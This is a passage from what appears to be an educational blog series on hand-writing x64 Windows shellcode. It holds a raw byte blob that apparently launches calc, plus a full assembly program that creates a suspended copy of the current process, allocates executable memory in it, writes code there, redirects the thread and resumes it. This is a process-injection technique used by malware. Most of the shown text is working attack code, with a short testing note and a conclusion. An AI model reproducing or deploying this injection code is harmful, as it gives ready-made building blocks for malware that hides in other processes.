dd 0x01483c42
dd 0x88808bd0
dd 0x48000000
dd 0x6774c085
dd 0x50d00148
dd 0x4418488b
dd 0x4920408b
dd 0x56e3d001
dd 0x41c9ff48
dd 0x4888348b
dd 0x314dd601
dd 0xc03148c9
dd 0xc9c141ac
dd 0xc101410d
dd 0xf175e038
dd 0x244c034c
dd 0xd1394508
dd 0x4458d875
dd 0x4924408b
dd 0x4166d001
dd 0x44480c8b
dd 0x491c408b
dd 0x8b41d001
dd 0x01488804
dd 0x415841d0
dd 0x5a595e58
dd 0x59415841
dd 0x83485a41
dd 0x524120ec
dd 0x4158e0ff
dd 0x8b485a59
dd 0xff57e912
dd 0x485dffff
dd 0x000001ba
dd 0x00000000
dd 0x8d8d4800
dd 0x00000101
dd 0x8b31ba41
dd 0xd5ff876f
dd 0x2a1de0bb
dd 0xa6ba410a
dd 0xff9dbd95
dd 0xc48348d5
dd 0x7c063c28
dd 0xe0fb800a
dd 0x47bb0575
dd 0x6a6f7213
dd 0x89415900
dd 0x63d5ffda
dd 0x00636c61
create_empty_structure:
pop rbx
xor rax, rax ; Zero RAX
sub rsp, rcx ; Allocate stack space for the two
; structures
mov rdi, rsp ; set rdi to point to the STARTUPINFO
; structure
push rdi ; Preserve RDI on the stack as it will
; be modified by the following
; instructions
rep stosb ; Repeat storing zero at the buffer
; starting at rdi until rcx is zero
pop rdi ; restore RDI to its original value
push rbx
ret
perform_injection:
; Get current process ImagePathName
mov rax, [gs:0x60] ; Store the address of the PEB structure in RAX
mov rax, [rax+0x20] ; Store the address of the
; _RTL_USER_PROCESS_PARAMETERS
; structure in RAX
mov rax, [rax+0x68] ; Store the address of the ImageProcessName
; value in RAX
mov [r13+0x48], rax ; Store the address of the process path at R13+0x48 to use later
; Create & Initialize structures
xor rcx, rcx
mov cl, 0x80
call create_empty_structure
mov byte[rdi], 0x68 ; Set STARTUPINFOW.cb = 0x68
; Create a suspended process
xor rcx, rcx ; prep the stack for x64 fastcall
mov cl, 0x48 ; 0x20 shadow space + 6 arguments
call create_empty_structure
lea rsi, [rdi+0x68] ; Load the effective address of the
; PROCESS_INFORMATION structure into RSI
mov [rsp+0x48], rsi ; Push the pointer to the lpProcessInformation
; structure
mov [rsp+0x40], rdi ; Push the pointer to the lpStartupInfo
; structure
mov [rsp+0x38], rax ; lpCurrentDirectory = NULL
mov [rsp+0x30], rax ; lpEnvironment = NULL
mov byte [rsp+0x28], 0x04 ; dwCreationFlags = CREATE_SUSPENDED
mov [rsp+0x20], rax ; bInheritHandles = FALSE
mov r9, rax ; lpThreadAttributes = NULL
mov r8, rax ; lpProcessAttributes = NULL
mov rdx, qword [r13+0x48] ; lpCommandLine = current process
mov rcx, rax ; lpApplicationName = NULL
call [r13+0x08] ; Call CreateProcessW
add rsp, 0x48 ; Clean up the stack 0x20 + 0x28 = fastcall + 6
; arguments
; Begin GetThreadContext
xor rcx, rcx ; Create CONTEXT object
mov ecx, 0x04F8 ; CONTEXT + 0x08 for padding for stack
; adjustment
call create_empty_structure
; Save CONTEXT object & 16-bit align it
mov r15, rsp
push 0
and r15, -16 ; CONTEXT object should be 16-bit aligned
mov dword [r15+0x30], 0x010007 ; CONTEXT ContextFlags = CONTEXT_FULL
xor rcx, rcx ; prep the stack for x64 fastcall
mov cl, 0x20 ; 0x20 shadow space
call create_empty_structure
mov rdx, r15 ; lpContext
mov rcx, qword [rsi+0x08] ; hThread = PROCESS_INFORMATION.hThread =
; R13+0x04
call [r13+0x18] ; Call GetThreadContext
add rsp, 0x20 ; Clean up stack
; Begin VirtualAllocEx
xor rcx, rcx ; prep the stack for x64 fastcall
mov cl, 0x28 ; 0x20 shadow space + 1 argument
call create_empty_structure
mov dword [rsp+0x20], 0x40 ; flProtect = PAGE_EXECUTE_READWRITE
mov r9, 0x1000 ; flAllocationType = MEM_COMMIT
mov r8, 0x5000 ; dwSize = 20kb
mov rdx, 0 ; lpAddress = NULL
mov rcx, qword [rsi] ; hProcess = PROCESS_INFORMATION.hProcess = RSI
call [r13+0x20] ; Call VirtualAllocEx
add rsp, 0x28
; Setup CONTEXT object for thread change
mov [r15+0xf8], rax ; CONTEXT object offset 0xB8 = RIP
; Begin WriteProcessMemory
xor rcx, rcx ; prep the stack for x64 fastcall
mov cl, 0x28 ; 0x20 shadow space + 1 argument
call create_empty_structure
mov dword [rsp+0x20], 0 ; lpNumberOfBytesWritten = NULL
mov r9, 0x110 ; nSize = 0x110 = 272 bytes
jmp injected_code ; jump to the stored code
injected_code_return: ; lpBuffer = return address pushed to the stack
pop r8 ; pop the return address into R8
mov rdx, [r15+0xf8] ; lpBaseAddress
mov ecx, dword [rsi] ; hProcess = PROCESS_INFORMATION.hProcess = RSI
call [r13+0x28] ; Call WriteProcessMemory
add rsp, 0x28
; Begin SetThreadContext
xor rcx, rcx ; prep the stack for x64 fastcall
mov cl, 0x20 ; 0x20 shadow space
call create_empty_structure
mov rdx, r15 ; lpContext = CONTEXT structure
mov rcx, qword [rsi+0x08] ; hThread = PROCESS_INFORMATION.hThread =
; RSI+0x04
call [r13+0x30] ; Call SetThreadContext
add rsp, 0x20 ; Clean up the stack
; Begin ResumeThread
xor rcx, rcx ; prep the stack for x64 fastcall
mov cl, 0x20 ; 0x20 shadow space
call create_empty_structure
mov rcx, qword [rsi+0x08] ; hThread = PROCESS_INFORMATION.hThread =
; RSI+0x04
call [r13+0x38] ; Call ResumeThread
add rsp, 0x20 ; Clean up the stack
; Begin GetCurrentProcess
xor rcx, rcx ; prep the stack for x64 fastcall
mov cl, 0x20 ; 0x20 shadow space
call create_empty_structure
call [r13+0x40] ; Call GetCurrentProcess
add rsp, 0x20 ; Clean up the stack
; Begin TerminateProcess
mov [r13+0x50], rax ; Save the process handle
xor rcx, rcx ; prep the stack for x64 fastcall
mov cl, 0x20 ; 0x20 shadow space
call create_empty_structure
xor rdx, rdx ; Exit Code 0
mov rcx, [r13+0x50] ; pHandle, RAX = Current process handle
call [r13+0x10] ; Call TerminateProcess
main:
sub rsp, 0x110 ; Allocate space on stack for function
; addresses
mov rbp, rsp ; Set ebp as frame ptr for relative offset on
; stack
call find_kernel32 ; Find base address of kernel32.dll
jmp win32_library_hashes
win32_library_hashes_return:
pop r8 ; R8 is the hash list location
mov r9, r8
add r9, 0x40 ; R9 marks the end of the hash list
lea r15, [rbp+0x10] ; This will be a working address used to store
; our function addresses
mov r13, r15 ; R13 will be used to reference the stored
; function addresses
call resolve_symbols_for_dll
call perform_injection
Code Listing 27: Full x64 Assembly Program
Testing it Out
To test out the assembled program, follow the procedure described above, this time placing the escaped byte code into the x64 section. To compile the final C program in x64, the 64-bit mingw compiler must be used:
Conclusion
There will be at least one more blog post in this series before it is wrapped up. Binding to a socket and self-injection are the final steps that remain to complete a functional One-Way-Shellcode, like what SK Chong wrote about in Phrack 62 in his article titled “History and Advances in Windows Shellcode”. I hope that this has been educational. Each time I write one of these, I learn a little bit more about writing Assembly. This process is as much for you, the reader, as it is for me.